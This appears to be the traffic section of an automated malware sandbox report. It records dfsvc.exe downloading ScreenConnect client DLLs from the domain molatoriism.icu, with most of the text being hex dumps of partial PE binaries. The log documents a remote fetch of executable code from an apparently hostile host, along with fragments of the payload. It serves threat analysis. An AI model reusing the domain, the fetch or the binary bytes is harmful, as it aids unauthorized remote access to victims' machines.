                                                                                                                                                                                                2024-11-07 16:56:12 UTC575INData Raw: 37 38 62 62 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                                                Data Ascii: 78bbMZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 16 00 00 0a 2a 5e 02 28 16 00 00 0a 02 17 8d 3b 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 16 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 16 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 16 00 00 0a 02 03 7d 03 00 00 04 2a 00 00 00 1b 30 07 00 9c 01 00 00 01 00 00 11 73 3e 00 00 06 0a 28 17 00 00 0a 28 18 00 00 0a 28 19 00 00 0a 28 1a 00 00 0a 28 1b 00 00 0a 16 28 1c 00 00 0a 28 1d 00 00 0a 0b 06 73 1e 00 00 0a 7d 42 00 00 04 06 73 1f 00 00 0a 7d 43 00 00 04 06 7e 40 00 00 04 25 2d 17 26 7e 3f 00 00 04 fe 06 3c 00 00 06 73 20 00 00 0a 25 80 40 00 00 04 6f 01 00 00 2b 0c 06 06 fe 06 40 00 00 06 73 20 00 00 0a 6f 01 00 00 2b 0d 06 06 06 fe 06 41 00 00 06 73 21 00 00 0a 6f 02 00 00
                                                                                                                                                                                                Data Ascii: (*^(;%}*:(}*:(}*:(}*0s>(((((((s}Bs}C~@%-&~?<s %@o+@s o+As!o
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 60 54 06 7b 0f 00 00 04 16 17 12 01 e0 28 54 00 00 0a 26 16 d3 03 04 05 28 46 00 00 0a 2a 1b 30 09 00 55 02 00 00 05 00 00 11 0e 04 1f 2b 40 d4 01 00 00 0e 06 28 42 00 00 0a 0a 06 7b 1d 00 00 04 06 7b 1a 00 00 04 17 28 4b 00 00 0a 0b 06 7b 1e 00 00 04 28 55 00 00 0a 0c 08 06 7b 1f 00 00 04 28 56 00 00 0a 28 57 00 00 0a 6f 58 00 00 0a 08 12 01 28 4c 00 00 0a 2d 03 16 2b 16 12 01 28 4d 00 00 0a 7b 59 00 00 0a 20 80 00 00 00 28 05 00 00 2b 2d 07 28 5a 00 00 0a 2b 05 28 5b 00 00 0a 6f 5c 00 00 0a 12 01 28 4c 00 00 0a 2d 03 17 2b 16 12 01 28 4d 00 00 0a 7b 4e 00 00 0a 20 00 08 00 00 28 04 00 00 2b 2c 53 08 28 5d 00 00 0a 06 7c 1f 00 00 04 7b 5e 00 00 0a 06 7c 1f 00 00 04 7b 5f 00 00 0a 06 7c 1f 00 00 04 7b 60 00 00 0a 58 18 5b 06 7c 1f 00 00 04 7b 61 00 00 0a
                                                                                                                                                                                                Data Ascii: `T{(T&(F*0U+@(B{{(K{(U{(V(WoX(L-+(M{Y (+-(Z+([o\(L-+(M{N (+,S(]|{^|{_|{`X[|{a
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 11 05 6f 7e 00 00 0a 2d b7 de 0c 11 05 2c 07 11 05 6f 2e 00 00 0a dc 2a 00 01 1c 00 00 02 00 15 01 58 6d 01 0c 00 00 00 00 02 00 6d 02 4d ba 02 0c 00 00 00 00 42 53 4a 42 01 00 01 00 00 00 00 00 0c 00 00 00 76 32 2e 30 2e 35 30 37 32 37 00 00 00 00 05 00 6c 00 00 00 c4 12 00 00 23 7e 00 00 30 13 00 00 04 14 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 34 27 00 00 48 01 00 00 23 55 53 00 7c 28 00 00 10 00 00 00 23 47 55 49 44 00 00 00 8c 28 00 00 b4 09 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 7f 02 0a 09 0e 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 67 00 00 00 1a 00 00 00 52 00 00 00 42 00 00 00 5d 00 00 00 02 00 00 00 8e 00 00 00 1c 00 00 00 37 00 00 00 11 00 00 00 01 00 00 00 06 00 00 00 07 00 00 00 0d 00 00 00 01 00 00 00 06 00 00 00 05 00
                                                                                                                                                                                                Data Ascii: o~-,o.*XmmMBSJBv2.0.50727l#~0#Strings4'H#US|(#GUID(#BlobW3gRB]7
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 22 02 06 00 b1 01 22 02 06 00 7c 0b 22 02 06 00 1d 12 22 02 06 00 aa 03 43 06 06 00 f6 06 22 02 06 00 ab 01 22 02 06 00 b1 01 22 02 06 00 a6 0d 22 02 06 00 53 07 22 02 06 00 93 0c 43 06 06 00 6a 01 43 06 06 00 8c 0c 4b 06 06 00 aa 03 43 06 51 80 7c 03 22 02 51 80 3b 02 22 02 51 80 64 03 22 02 51 80 85 03 22 02 51 80 4f 03 22 02 51 80 b8 01 22 02 51 80 de 01 22 02 51 80 f0 01 22 02 51 80 90 01 22 02 51 80 d3 01 22 02 56 80 c8 01 22 02 56 80 01 02 22 02 51 80 17 02 22 02 51 80 8f 03 22 02 51 80 0c 02 22 02 51 80 5d 01 22 02 06 06 a2 03 22 02 56 80 67 02 50 06 56 80 a7 02 50 06 06 06 a2 03 22 02 56 80 ed 02 54 06 56 80 c0 02 54 06 56 80 af 02 54 06 56 80 3f 03 54 06 56 80 77 02 54 06 56 80 52 02 54 06 56 80 6e 03 54 06 16 00 d1 05 58 06 16 00 2e 06 60 06 16
                                                                                                                                                                                                Data Ascii: ""|""C""""S"CjCKCQ|"Q;"Qd"Q"QO"Q"Q"Q"Q"Q"V"V"Q"Q"Q"Q]""VgPVP"VTVTVTV?TVwTVRTVnTX.`
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 04 00 00 02 00 96 0b 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 03 00 c1 04 00 00 01 00 a8 04 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 03 00 c1 04 00 00 00 00 00 00 00 00 01 00 a8 04 00 00 02 00 b9 0c 00 00 01 00 b8 12 00 00 01 00 23 10 00 00 02 00 cd 03 00 00 01 00 e2 06 02 00 01 00 e1 06 01 20 01 00 b6 04 02 00 02 00 8a 05 00 00 01 00 8b 05 00 00 01 00 17 11 02 00 01 00 17 11 00 00 01 00 96 0b 00 00 01 00 96 0b 00 00 01 00 9c 06 00 20 01 00 9c 06 00 00 01 00 4f 06 00 00 01 00 3d 13 00 00 01 00 2b 0c 00 00 01 00 96 0b 00 00 02 00 89 0e 00 00 01 00 c8 03 00 00
                                                                                                                                                                                                Data Ascii: # O=+
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 29 05 08 00 90 00 2e 05 08 00 94 00 33 05 08 00 98 00 38 05 08 00 9c 00 3d 05 08 00 a0 00 42 05 08 00 a4 00 47 05 08 00 a8 00 4c 05 08 00 ac 00 51 05 08 00 b0 00 33 05 08 00 b4 00 56 05 08 00 b8 00 2e 05 08 00 bc 00 5b 05 08 00 c0 00 60 05 08 00 c8 00 29 05 08 00 cc 00 2e 05 08 00 d4 00 65 05 08 00 d8 00 6a 05 08 00 dc 00 6f 05 08 00 e0 00 74 05 08 00 e4 00 79 05 08 00 e8 00 7e 05 08 00 ec 00 83 05 08 00 18 01 51 05 08 00 1c 01 88 05 08 00 20 01 8d 05 25 00 12 00 a5 06 27 00 5b 00 2e 05 27 00 2a 00 a9 09 2e 00 0b 00 7b 07 2e 00 13 00 84 07 2e 00 1b 00 a3 07 2e 00 23 00 ac 07 2e 00 2b 00 cc 07 2e 00 33 00 df 07 2e 00 3b 00 a5 06 2e 00 43 00 a5 06 2e 00 4b 00 fb 07 43 00 63 00 2e 05 43 00 0a 00 2e 05 63 00 63 00 2e 05 63 00 0a 00 2e 05 63 00 6b 00 15 08 81
                                                                                                                                                                                                Data Ascii: ).38=BGLQ3V.[`).ejoty~Q %'[.'*.{...#.+.3.;.C.KCc.C.cc.c.ck
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 45 00 54 56 45 5f 54 4f 47 47 4c 45 00 54 56 49 46 5f 53 54 41 54 45 00 4d 41 58 5f 54 45 58 54 5f 53 49 5a 45 00 52 65 63 74 61 6e 67 6c 65 46 00 4d 53 47 00 57 48 00 47 57 4c 00 54 56 4d 5f 47 45 54 4e 45 58 54 49 54 45 4d 00 54 56 49 54 45 4d 00 46 4f 52 43 45 46 49 4c 45 53 59 53 54 45 4d 00 4d 49 49 4d 00 42 4f 54 54 4f 4d 00 57 4d 00 53 49 47 44 4e 00 46 4f 52 43 45 53 48 4f 57 48 49 44 44 45 4e 00 3c 3e 4f 00 4d 45 4e 55 49 54 45 4d 49 4e 46 4f 00 3c 64 69 61 6c 6f 67 3e 50 00 46 44 41 50 00 54 4f 50 00 53 57 50 00 48 49 44 45 50 49 4e 4e 45 44 50 4c 41 43 45 53 00 48 49 44 45 4d 52 55 50 4c 41 43 45 53 00 4d 46 53 00 54 56 49 53 00 46 49 4c 45 4f 50 45 4e 44 49 41 4c 4f 47 4f 50 54 49 4f 4e 53 00 41 4c 4c 4f 57 4d 55 4c 54 49 53 45 4c 45 43 54 00
                                                                                                                                                                                                Data Ascii: ETVE_TOGGLETVIF_STATEMAX_TEXT_SIZERectangleFMSGWHGWLTVM_GETNEXTITEMTVITEMFORCEFILESYSTEMMIIMBOTTOMWMSIGDNFORCESHOWHIDDEN<>OMENUITEMINFO<dialog>PFDAPTOPSWPHIDEPINNEDPLACESHIDEMRUPLACESMFSTVISFILEOPENDIALOGOPTIONSALLOWMULTISELECT
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 74 61 74 65 00 73 74 61 74 65 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 49 46 69 6c 65 44 69 61 6c 6f 67 45 76 65 6e 74 73 2e 4f 6e 4f 76 65 72 77 72 69 74 65 00 53 54 41 54 68 72 65 61 64 41 74 74 72 69 62 75 74 65 00 45 6d 62 65 64 64 65 64 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 43 6c 61 73 73 49 6e 74 65 72 66 61 63 65 41 74 74 72 69 62 75 74 65 00 55 6e 76 65 72 69 66 69 61 62 6c 65 43 6f 64 65 41 74 74 72 69 62 75 74 65 00 41 74 74 72 69 62 75 74 65 55 73 61 67 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 4e 75 6c 6c 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65
                                                                                                                                                                                                Data Ascii: tatestateScreenConnect.IFileDialogEvents.OnOverwriteSTAThreadAttributeEmbeddedAttributeCompilerGeneratedAttributeGuidAttributeClassInterfaceAttributeUnverifiableCodeAttributeAttributeUsageAttributeDebuggableAttributeNullableAttributeComVisible
                                                                                                                                                                                                2024-11-07 16:56:12 UTC1369INData Raw: 65 78 74 49 74 65 6d 00 68 69 74 65 6d 00 53 79 73 74 65 6d 00 67 65 74 5f 42 6f 74 74 6f 6d 00 62 6f 74 74 6f 6d 00 45 6e 75 6d 00 50 65 6e 00 43 6c 69 65 6e 74 54 6f 53 63 72 65 65 6e 00 63 43 68 69 6c 64 72 65 6e 00 4d 61 69 6e 00 46 69 78 75 70 41 70 70 44 6f 6d 61 69 6e 00 45 78 74 72 61 63 74 41 73 73 6f 63 69 61 74 65 64 49 63 6f 6e 00 56 65 72 73 69 6f 6e 00 41 70 70 6c 69 63 61 74 69 6f 6e 00 67 65 74 5f 4c 6f 63 61 74 69 6f 6e 00 47 65 74 4d 65 73 73 61 67 65 4d 6f 75 73 65 53 63 72 65 65 6e 4c 6f 63 61 74 69 6f 6e 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 49 46 69 6c 65 44 69 61 6c 6f 67 45 76 65 6e 74 73 2e 4f 6e 53 68 61 72 65 56 69 6f 6c 61 74 69 6f 6e 00 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 00 69 74 65 6d 41 63 74 69 6f 6e
                                                                                                                                                                                                Data Ascii: extItemhitemSystemget_BottombottomEnumPenClientToScreencChildrenMainFixupAppDomainExtractAssociatedIconVersionApplicationget_LocationGetMessageMouseScreenLocationScreenConnect.IFileDialogEvents.OnShareViolationSystemInformationitemAction


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.949851104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:14 UTC116OUTGET /Bin/ScreenConnect.Client.dll HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-11-07 16:56:14 UTC769INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:14 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mHMif8ZkwU8rTyiEFqf5MFRoyznBhw455Ydi%2BusrGOcO71NeMl5g7grTKivEV5ofK2NEXmx6ZDP%2BQpszsZiMztffCqx2ynHYn0ELgq0g6DhRNUIZLfVJw4hrTqFEPNLYzIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedb00bd296c6b-DFW
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1214&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=707&delivery_rate=2322373&cwnd=234&unsent_bytes=0&cid=92ba6a810292f747&ts=592&x=0"
                                                                                                                                                                                                2024-11-07 16:56:14 UTC600INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                                                Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 28 1c 00 00 0a 2a 1e 02 28 1c 00 00 0a 2a 5e 02 28 1c 00 00 0a 02 17 8d 9c 00 00 01 25 16 03 9c 7d 01 00 00 04 2a 3a 02 28 1c 00 00 0a 02 03 7d 01 00 00 04 2a 3a 02 28 1c 00 00 0a 02 03 7d 02 00 00 04 2a 3a 02 28 1c 00 00 0a 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 3a 02 28 1d 00 00 0a 02 03 7d 04 00 00 04 2a 13 30 06 00 41 00 00 00 00 00 00 00 02 28 07 00 00 06 73 1e 00 00 0a 25 03 7e 28 01 00 04 25 2d 17 26 7e 27 01 00 04 fe 06 79 04 00 06 73 1f 00 00 0a 25 80 28 01 00 04 28 01 00 00 2b 28 02 00 00 2b 6f 22 00 00 0a 6f b6 03 00 06 2a 00 00 00 13 30 0b 00 73 00 00 00 00 00 00 00 7e 23 00 00 0a 1f 11 32 07 20 c8 00 00 00 2b 02 1f 14 6a 80 16 00 00 04 20 e8 03 00 00 80 1d 00 00 04 20 d0 07 00 00 80 1e 00 00 04 18 8d a1 00 00 01 25 16 72 01 00 00 70
                                                                                                                                                                                                Data Ascii: (*(*^(%}*:(}*:(}*:(}*{*:(}*0A(s%~(%-&~'ys%((+(+o"o*0s~#2 +j %rp
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 2a 1e 02 7b 56 00 00 04 2a 22 02 03 7d 56 00 00 04 2a 1e 02 28 4a 00 00 0a 2a 1e 02 7b 57 00 00 04 2a 22 02 03 7d 57 00 00 04 2a 1e 02 7b 58 00 00 04 2a 22 02 03 7d 58 00 00 04 2a 1e 02 7b 59 00 00 04 2a 22 02 03 7d 59 00 00 04 2a 1e 02 28 49 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 28 49 00 00 0a 2a 1e 02 7b 5a 00 00 04 2a 22 02 03 7d 5a 00 00 04 2a 1e 02 7b 5b 00 00 04 2a 22 02 03 7d 5b 00 00 04 2a 1e 02 7b 5c 00 00 04 2a 22 02 03 7d 5c 00 00 04 2a 1e 02 28 4d 00 00 06 2a 1e 02 7b 5d 00 00 04 2a 22 02 03 7d 5d 00 00 04 2a 1e 02 28 4d 00 00 06 2a 1e 02 7b 5e 00 00 04 2a 22 02 03 7d 5e 00 00 04 2a 1e 02 7b 5f 00 00 04 2a 22 02 03 7d 5f 00 00 04 2a 1e 02 28 4d 00 00 06 2a 1e 02 7b 60 00 00 04 2a 22 02 03 7d 60 00 00 04 2a 1e 02 7b 61 00 00 04 2a 22 02 03
                                                                                                                                                                                                Data Ascii: *{V*"}V*(J*{W*"}W*{X*"}X*{Y*"}Y*(I*(I*(I*{Z*"}Z*{[*"}[*{\*"}\*(M*{]*"}]*(M*{^*"}^*{_*"}_*(M*{`*"}`*{a*"
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 8c 74 00 00 1b 07 8c 71 00 00 1b 6f 70 00 00 0a 6f 71 00 00 0a 8c 74 00 00 1b 28 72 00 00 0a 02 07 6f 73 00 00 0a 02 28 0f 00 00 2b 25 8c 74 00 00 1b 07 8c 71 00 00 1b 6f 70 00 00 0a 6f 71 00 00 0a 8c 74 00 00 1b 28 72 00 00 0a de 0a 08 2c 06 08 6f 14 00 00 0a dc 06 7b 68 00 00 0a 8c 75 00 00 1b 6f 74 00 00 0a 39 5f ff ff ff 2a 00 00 01 10 00 00 02 00 51 00 55 a6 00 0a 00 00 00 00 1e 02 28 1c 00 00 0a 2a 22 02 03 7d 96 00 00 04 2a 1e 02 7b 96 00 00 04 2a 22 02 03 7d 96 00 00 04 2a 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 2f 01 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 c5 00 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 0d 00 00 11 03 72 61
                                                                                                                                                                                                Data Ascii: tqopoqt(ros(+%tqopoqt(r,o{huot9_*QU(*"}*{*"}*0@sur/pov&rYpov&(, ow&}ow&o)*0)ra
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 04 6f 80 00 00 0a 20 29 55 55 a5 5a 28 81 00 00 0a 02 7b 9a 00 00 04 6f 82 00 00 0a 58 2a 5e 03 75 40 00 00 02 2c 0d 02 03 a5 40 00 00 02 28 fb 00 00 06 2a 16 2a c6 28 7f 00 00 0a 02 7b 99 00 00 04 03 7b 99 00 00 04 6f 83 00 00 0a 2c 17 28 81 00 00 0a 02 7b 9a 00 00 04 03 7b 9a 00 00 04 6f 84 00 00 0a 2a 16 2a 56 03 02 28 f1 00 00 06 54 04 02 28 f3 00 00 06 81 1b 00 00 01 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 bd 02 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 01 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 6e 03 72 fb 02 00 70 6f 76 00 00 0a 26 03 02 28 fe 00 00 06 6f 7b 00 00
                                                                                                                                                                                                Data Ascii: o )UUZ({oX*^u@,@(**({{o,({{o**V(T(*"}*{*"}*0@surpov&rYpov&(, ow&}ow&o)*nrpov&(o{
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 03 75 46 00 00 02 2c 0d 02 03 a5 46 00 00 02 28 32 01 00 06 2a 16 2a 00 00 00 13 30 03 00 49 00 00 00 00 00 00 00 28 8b 00 00 0a 02 7b a1 00 00 04 03 7b a1 00 00 04 6f 91 00 00 0a 2c 2f 28 8d 00 00 0a 02 7b a2 00 00 04 03 7b a2 00 00 04 6f 92 00 00 0a 2c 17 28 8f 00 00 0a 02 7b a3 00 00 04 03 7b a3 00 00 04 6f 93 00 00 0a 2a 16 2a 66 03 02 28 26 01 00 06 52 04 02 28 28 01 00 06 df 05 02 28 2a 01 00 06 54 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 8b 04 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 35 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 37 01 00 06 16 fe 01 2a 26 0f 00 03 28 3a 01 00 06 2a 0a 16 2a 5e 03 75 47 00 00 02 2c 0d 02 03 a5 47
                                                                                                                                                                                                Data Ascii: uF,F(2**0I({{o,/({{o,({{o**f(&R(((*T*0@surpov&rYpov&(5, ow&}ow&o)**.(7*&(:**^uG,G
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 75 4c 00 00 02 2c 0d 02 03 a5 4c 00 00 02 28 6c 01 00 06 2a 16 2a 5e 28 8b 00 00 0a 02 7b a7 00 00 04 03 7b a7 00 00 04 6f 91 00 00 0a 2a 26 03 02 28 64 01 00 06 52 2a 22 02 03 7d a8 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 cd 05 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 72 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 12 00 00 11 03 72 25 05 00 70 6f 76 00 00 0a 26 03 02 28 6f 01 00 06 0a 12 00 fe 16 b1 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 74 01 00 06 16 fe 01 2a 26 0f 00 03 28 77 01 00 06 2a 46 28 8b 00 00 0a 02 7b a8 00 00 04 6f 8c 00 00 0a 2a 5e
                                                                                                                                                                                                Data Ascii: uL,L(l**^({{o*&(dR*"}*{*"}*0@surpov&rYpov&(r, ow&}ow&o)*0)r%pov&(oo)ov&*.(t*&(w*F({o*^
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 0a 26 02 06 28 ac 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ae 01 00 06 16 fe 01 2a 26 0f 00 03 28 b1 01 00 06 2a 0a 16 2a 5e 03 75 54 00 00 02 2c 0d 02 03 a5 54 00 00 02 28 b1 01 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 53 07 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 b3 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 b5 01 00 06 16 fe 01 2a 26 0f 00 03 28 b8 01 00 06 2a 0a 16 2a 5e 03 75 55 00 00 02 2c 0d 02 03 a5 55 00 00 02 28 b8 01 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 75 07 00 70 6f 76 00 00 0a 26 06
                                                                                                                                                                                                Data Ascii: &(, ow&}ow&o)**.(*&(**^uT,T(***0@surSpov&rYpov&(, ow&}ow&o)**.(*&(**^uU,U(***0@surupov&
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 03 7d af 00 00 04 2a 1e 02 7b af 00 00 04 2a 22 02 03 7d af 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c5 08 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 ee 01 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 15 00 00 11 03 72 f9 08 00 70 6f 76 00 00 0a 26 03 02 28 eb 01 00 06 0a 12 00 fe 16 1a 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 f0 01 00 06 16 fe 01 2a 26 0f 00 03 28 f3 01 00 06 2a 46 28 97 00 00 0a 02 7b af 00 00 04 6f 98 00 00 0a 2a 5e 03 75 5b 00 00 02 2c 0d 02 03 a5 5b 00 00 02 28 f3 01 00 06 2a 16 2a 5e 28 97 00 00 0a 02 7b af 00 00 04 03 7b af 00 00 04 6f 99 00 00 0a 2a 36 03 02 28 eb 01 00 06 81 1a 00
                                                                                                                                                                                                Data Ascii: }*{*"}*0@surpov&rYpov&(, ow&}ow&o)*0)rpov&(o)ov&*.(*&(*F({o*^u[,[(**^({{o*6(
                                                                                                                                                                                                2024-11-07 16:56:14 UTC1369INData Raw: 6f 29 00 00 0a 2a 13 30 02 00 29 00 00 00 12 00 00 11 03 72 25 05 00 70 6f 76 00 00 0a 26 03 02 28 28 02 00 06 0a 12 00 fe 16 b1 00 00 01 6f 29 00 00 0a 6f 76 00 00 0a 26 17 2a 2e 02 03 28 2d 02 00 06 16 fe 01 2a 26 0f 00 03 28 30 02 00 06 2a 46 28 8b 00 00 0a 02 7b b2 00 00 04 6f 8c 00 00 0a 2a 5e 03 75 62 00 00 02 2c 0d 02 03 a5 62 00 00 02 28 30 02 00 06 2a 16 2a 5e 28 8b 00 00 0a 02 7b b2 00 00 04 03 7b b2 00 00 04 6f 91 00 00 0a 2a 26 03 02 28 28 02 00 06 52 2a 22 02 03 7d b3 00 00 04 2a 1e 02 7b b3 00 00 04 2a 22 02 03 7d b3 00 00 04 2a 00 00 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 69 0a 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 36 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26
                                                                                                                                                                                                Data Ascii: o)*0)r%pov&((o)ov&*.(-*&(0*F({o*^ub,b(0**^({{o*&((R*"}*{*"}*0@suripov&rYpov&(6, ow&}ow&


